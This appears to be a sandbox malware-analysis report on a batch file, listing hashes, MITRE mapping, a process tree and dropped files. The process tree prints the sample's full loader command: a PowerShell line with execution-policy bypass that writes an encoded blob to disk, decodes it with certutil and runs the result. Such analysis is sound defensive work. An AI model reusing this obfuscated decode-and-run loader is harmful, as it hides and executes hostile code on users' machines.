a6b61f487434f045952421fc785441212b57f52b385a243e6be46ecf6814eb6c

General

Target

.bat
Size

5KB
MD5

2ea3cbe394afeb2832eff06e659c0f36
SHA1

f016a8202f3dc84a9a66e615e52974fd12f44ea9
SHA256

a6b61f487434f045952421fc785441212b57f52b385a243e6be46ecf6814eb6c
SHA512

74e5f57eeb50481eb62676971aaf7dba493bf0e6ab94e00caf2e1eacb6a8faf87c344dfb3e7e46bdebc41fce5ab13bb7a6fb48a5452d0f2d1e85b969d1b0f050
SSDEEP

96:0VvtGRkqqgwq0gzncJ8EQNlI1S6Lb5JZfAVJqQXGmyWEoscyWA6BYLMIoZseRW1w:yv0Hq/q0gz691S6PVfATqQXzyWFVyW+k

Score

6^/10

defense_evasion

Malware Config

Signatures

Deobfuscate/Decode Files or Information 1 TTPs 2 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
3052	certutil.exe
2760	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2760	powershell.exe
2760	powershell.exe
2760	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 2760	2640	cmd.exe	31
PID 2640 wrote to memory of 2760	2640	cmd.exe	31
PID 2640 wrote to memory of 2760	2640	cmd.exe	31
PID 2760 wrote to memory of 3052	2760	powershell.exe	32
PID 2760 wrote to memory of 3052	2760	powershell.exe	32
PID 2760 wrote to memory of 3052	2760	powershell.exe	32
PID 2760 wrote to memory of 2880	2760	powershell.exe	33
PID 2760 wrote to memory of 2880	2760	powershell.exe	33
PID 2760 wrote to memory of 2880	2760	powershell.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -ExecutionPolicy Bypass -Command "echo CuaMpueNrOCoje+7v+C0iuaVgOaho+KBr+aZr+C1puC0iuOoiuKAuuaVk+KBtOa9ueeJteaQoOeNqea9o+aRsuecoOaJpea9qOatr+CojeaVs+KBtOaVt+ahoua9r+O1q+eRqOeBtOOps+K8r+alpOaNs+eJr+K5pOa9o+K9reeBoeK9qeaVt+ahoua9r+eNq+OEr+OgsuOEtuOEtOOkteOQuOOQuOOks+OEuOOIseecr+ORsOSIuOWNieS5jea5teads+alieelkuWdreeJtea9ouWhkeSoueOFhuWlmeSFhOWZuuaNseatkeaNo+a5keSppuOVruWRoeWgs+aVsuShmOSFoeacseShp+WZh+S8reaVqeC1jOC0iuOoiuKAuueZheeJpea9ueaVruO8oOWQoOeVsuK9peaFhueNrOC1peeMiueRpeaUoOaVtuelsua5r+O1peeJlOaVteCojeCojeOouuSwoOeVoeaNruKBqOeRoeaMoOa1r+eVsOaVtOKBsueRs+eJoeeVtOKBsOeJlOaVteSYr+axoeaVs+CojeOouuSIoOeRpeC1oeeMiueRpeeMoOaFtOeRsueBteSYveaxoeaVs+CojeCojeOouuS0oOa5qea1qeepqeKBpeahtOKBpealt+aRruedr+aEoOKBtOeRs+eJoeeVtOC1sOeMiueRpeaYoOaxqeW9peaFruaVreKUvea5vuOBuOCojeaVs+KBtOaNs+alsueRsOaFkOahtOKUveaRvuOBsOe4peehruC0sOakiuKBpua9ruKBtOehpeeNqeKBtOKUoueBoeaRsOeRoeKVoeOBnOOEseOAruOEseeQrueRuOKAouaNpea9qOKAruKAvuaEpeeBsOaFpOaFtOWwpeOEsOK4seOEsOK4seehtOKBtOKApueRs+eJoeKBtOS0r+S5ieKUoOaNs+alsueRsOaFkOahtOKApeKApuehpeeRqeCojeaVpOKBrOSYr+KIoOaEpeeBsOaFpOaFtOWwpeOEsOK4seOEsOK4seehtOKJtOCojeCojeOouuSwoOeVoeaNruKBqOeRoeeMoOaFtOeRsueBteakoOKBpueJlOaVteCojeaVs+KBtOeRs+eJoeeVtOSZsOaxr+aVpOO1suOpg+WVnOaVs+eNsuKVnOeNteeJpeaFruaVreWwpeeBgeSRsOeRoeWxoea9kua1oea5qeWxp+aljeeJo+eNr+aZr+WxtOall+aRruedr+Wxs+eRk+eJoeKBtOaVjeeVruWBnOa9sueJp+a1oeWxs+eRk+eJoeeVtOC1sOakiuKBpueMpeaFtOeRsueBteO0peWQveeVsuKBpea9o+elsOKIoOeMpeeJo+eBqeWBtOeRoeKVqOKAouKUoueRs+eJoeeVtOSZsOaxr+aVpOKVsuC0ouC0iuOoiuKAuuaVk+KBtOeRs+aFpeKBrOSRieCojeaVs+KBtOaRqeKUveaFsuaRrua1r+C0peC0iuOoiuKAuuaVhOaVrOaVtOaEoOaxrOaYoOaxqeeNpeCojeaFo+axrOOooOaVpOaVrOaVtOaZn+axqeeNpeO4oOeVruC1rOC0iuOoiuKAuuaVh+KBtOaxo+eBqea9oueJoeC1pOeMiueRpea9rOaFo+C1rOaYiueJr+K8oOKBpuaQouaxpea1qeO1s+KAouKUpeKBqea5qeKgoOeAp+edr+eJpeahs+axpeKBrOaMrea1r+aFreaRruKIoOaVh+K1tOaxg+eBqea9oueJoeKJpOKkp+aQoOKBr+aVs+KBtOaMoualrOaJsOaFr+aRsuKUveakpeC0ouC0iuOoiuKAuuaVh+KBtOeBqeCojeaVs+axtOaNr+axoeCojea9puKBsuaYr+KIoOaVpOalrOeNreKIveKUoOakpeakoOKBruKcqOeNrua9rOatr+eBtea0oOalueK5sOeBr+a5pea5pOK5s+a9o+KBreaVsua9s+eZrOeJpeK4seeBr+a5pea5pOK5s+a9o+KBreW4sua4vuaxteW4oOKBvOalpuaRruKIoOaRgeeJpOeNpeOps+KcogrmvaTnjKDnkaXiiKDnpa3nganilL3mpKXgtKLnjIrnkaXmpKDjtbDmtKXmpbnjqbDjhb7ilLDgqI3gqI3jqLrljKDniaPmlaXnja7mvajgtbTnjIrnkaXmmKDmsanmuaXmtaHjtaXmjbPmlbLmuaXmobPnka/ngK7mna7gqI3mlbPigbTmvabmkazniaXilL3ngaHmkbDnkaHilaHgqI3mkaPilKDmvabmkazniaXgtKXngIrnna/niaXmobPmsaXigazmjK3mta/mha3mka7iiKDigKbkhbvmkaTlkK3ngbnigaXkhK3njbPmtaXmsaLkubnmtaHigaXnpZPnkbPmtaXlnK7muanmvaTnjbfkmK7nia/nja3igLvljZvnjbnmlbTiua3mpZfmka7nna/iubPmvYbmtbLiubPmlZPmka7mlYvnjbnjqZ3ljLrmuaXlnaTmpaHiobTnrKfliZDljZTntYPipKfigLvnkZPniaHitbTmsZPmlaXigbDktK3msanmpazmlbPmvaPmka7igbPjgLXjrLDikKDmtanigafigL3ljZvnjbnmlbTiua3mpZfmka7nna/iubPmvYbmtbLiubPmsYPnganmvaLniaHltaTjqLrmlYfkpbTmha3mlafipKjigLvmpKTmna3ljK7nmaHioaXilKfmpabmlazmha7mla3inKXjrKniib3gqI3gqI3jqLrknKDnkaXnkKDmtangtaXnjIrnkaXniKDmhaXnkazmtanjtaXnkKXmtanjqaXjgb7jiKzjqKXnkKXmtanjqaXjjb7jiKzjqKXnkKXmtanjqaXjmb7jiKzgtKXgtIrjqIrigLrmlYfigbTnnbDgtaTkjIrlgY/igZnilKLmvazmhaPmhazngbDmhaTmhbTlsKXmvYfmna/mlazkjZzniajmta/lsaXnjZXniaXkkKDnkaHlsaHmlYTmhabmsbXlsbTmvYzmpafiga7mhYTmhbTigKLilKLngaHmkbDnkaHilaHngK/mkbfnkK7nkbjigKLmuL7msbXgqI3gqI3gqI3jqLrljKDmuaXigaTmsaHigazmuanmvabmtbLnkaHmvannja7gqI3jqLrjuKDlgKDmuanigafnmaXniaXmvbnmla7mpKDigabnkannjKflkKDnlbLgtaXmpIrigabmlKXmlbbnpbLmua/ilaXjtL3niZTmlbXmjKDnibXigazloK3lgKDljY/igZTkoK3iiKDmvYPnka7muaXitbTnpbTmlbDigLrngaHmsbDmjannkaHmvaniva7njarmua/igKLitK3mhaTmhbTiiKDlsbvnlKLmlbPmubLmtaHlsaXjqKLlsKDkiKLnkaHmoaPnjKDmlbTmsaHniaXiiZzigKziiZzmvaPnka7muaXlsbTjqKLlsKDkgKLnmaXniaXmvbnmla7iiZzigKziiZznmaHnkaHniaHnlZ/msbLiiZzlsLrmoKLnkbTnjbDivLrmpK/mpK7mna3nibXmjK7mta/npK/klajngarkqZPngK7mna7iiZziib3ilKDmlbfmoaLmva/ilavitKDnjK3msbPmuK3ita/mlbLmvbbmlavitKDigYzkvK3juKDnla7gtazjqIrigLrigL7njZXniaXigKzngYnigKzmpbTmla3igKzmhaTmlbTigKznja/mhKDmka7mjKDmta/nlbDmlbTmubLmtaHgtaXmjIrnibXigazloK3lgKDljY/igZTkoK3iiKDmvYPnka7muaXitbTnpbTmlbDigLrngaHmsbDmjannkaHmvaniva7njarmua/igKLitK3mhaTmhbTiiKDlsbvnlKLmlbPmubLmtaHlsaXjqKLlsKDkiKLnkaHmoaPnjKDmlbTmsaHniaXiiZzigKziiZzmvaPnka7muaXlsbTjqKLlsKDmgKLmgaDnjaPmuZzkuKPnnaXmpKDmma7nia/mha3mpbTmua/mgLrmgaDmgKDmgaDnjZXniaXjtKDilKDnjbXniaXmha7mla3lsKXkpa7igbDigL3mpKXilbDmuZznja/jtKDilKDnja/lsKXkja7mta/nlbDmlbTmubLmtaHigaXigL3mjKXmta/nlbDmlbTmubLmtaHilaXmuZzmsYPnganmvaLniaHigaTigL3kjKXmpazmibDmha/mkbLlsKXnka7mtanigaXigL3ilKDmlbLmsaHmpbTmla3lsKXmka7nkaHigaXigL3mkKXnkaHilaXmuZzmkYnjtKDilKDmkanigKXmgaDlsaDisKLlsKDmhKLmhbbmhbTlvbLnibXlsazjqKLiiZznkajngbTjqbPivK/iuanmtannlafiubLmvaPiva3mobnmqYXljbDiuYrmubDlsafntKLigKLnnKXmiaXmvajmra/igKXitK3njbPitazmva7niK3nmaXmra/igaXksK3itKDigY/muL7msbXgqI3jqLrjuKDljKDmuaXigaTmjbPmlbLmuaXmobPnka/gqI3nlaPmsbLitKDigavkmK3iiKDmhbDmsbnmha/lvaTnjarmua/nrL3iiZznjbXniaXmha7mla3iiZzigLriiZzmhYLmjbTigajnkbPmhaXmlazlsbLisKLlsKDmjKLmua/mlbTnka7iiZzigLriiZzmgaDkuaDnnaXnjKDniaPmlaXiga7mvabmubXigaTilKjmkanipKXmgLrmgaDiiZziib3itKDigYbmpabmlazkgL3mhKXngbDmhaTmhbTivKXmjbPmlbLmuaXmobPnka/ngK7mna7ilKDmlbfmoaLmva/ilavitKDnjK3msbPmuK3ita/mlbLmvbbmlavitKDigYzkvK3juKDnla7gtazjqIrigLrigL7mlZPmka7mjKDniajmta/igaXniaPngbnmlbTigaTmhbDnjbPmvbfmkbLgtbPmjIrnibXigazmrK3itKDigYbngKLnpaHmvazmkaHmqZ/mvbPjta7lsbvnlKLmlbPmubLmtaHlsaXjqKLlsKDkiKLnkaHmoaPnjKDmlbTmsaHniaXiiZzigKziiZzmvaPnka7muaXlsbTjqKLlsKDmgKLmgaDmlY7igbfmoaPmvbLmla3ngKDnjaHnnbPnia/njaTmmKDnla/mka7ioKDmpKXilaTjqKnmgaDlsaDntKLigKLkmK3mmKDmsanjtaXilYDngaHmkbDnkaHilaHngK/mkbfnkK7nkbjilKDmlbfmoaLmva/ilavitKDnjK3msbPmuK3ita/mlbLmvbbmlavitKDigYzkvK3juKDnla7gtazgtIrmjIrmsaHigazmkLrmsaXnkaXlvaXmpabmlazgtbPmlIrmpbjgtbTgtIrjqIrigLrmlYTmlazmlbTmhKDmsazmmKDmsannjaXgqI3mkLrmsaXnkaXlvaXmpabmlazgtbPmkIrmsaXivKDigYbilKLngaHmkbDnkaHilaHnjZzniaPmlaXnja7mvajiubTmubDiiafjuKDnla7gtazmkIrmsaXivKDigYbilKLngaHmkbDnkaHilaHngZzmkbfnkK7nkbjigKLmuL7msbXgqI3mvafmvbTjqKDmvaUK | Out-File temp.b64; certutil -decode temp.b64 temp.bat; start temp.bat"
  2⤵
  - Deobfuscate/Decode Files or Information
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\system32\certutil.exe
    "C:\Windows\system32\certutil.exe" -decode temp.b64 temp.bat
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:3052
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\temp.bat" "
    3⤵
    PID:2880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

1

T1140

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\temp.b64

Filesize
11KB

MD5
a6e068f11647a8dd99f60130297ad5a8

SHA1
23e87d157c619606e252ffacdd3c6b68dcf26404

SHA256
3b91b167c3b91c195da2a31b16f96d37ab1c1e5b74689417ed394c3c257f90e0

SHA512
d8a268465b55cf761db6cbec2caf855c495279e77ec3c02ce8b47246ae3b2c68ea97fccafc5a3a7399feac9b1cc5018b8b1d466c1756c3c62202d973868725d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.bat

Filesize
4KB

MD5
2b9f4455c19eef318643c33af7cd4727

SHA1
aed87a93dfd28a8c8b264830bcc9b460f5825049

SHA256
04307152024985074f450ff80f809fef550c5a48ecea28f8c1c059cfc904488b

SHA512
40f6b91a08c0250a6969a684fa7766df88299a97f31c388c5bf28bc9a8ce422c63d7cdcde723af7801a8534de994c9ce1758b6f7b3b37ada9ace31bb4ec85995

Download Submit
memory/2760-4-0x000007FEF4E4E000-0x000007FEF4E4F000-memory.dmp

Filesize
4KB

Download
memory/2760-5-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-6-0x000000001B330000-0x000000001B612000-memory.dmp

Filesize
2.9MB

Download
memory/2760-7-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-8-0x0000000002510000-0x0000000002518000-memory.dmp

Filesize
32KB

Download
memory/2760-10-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-14-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing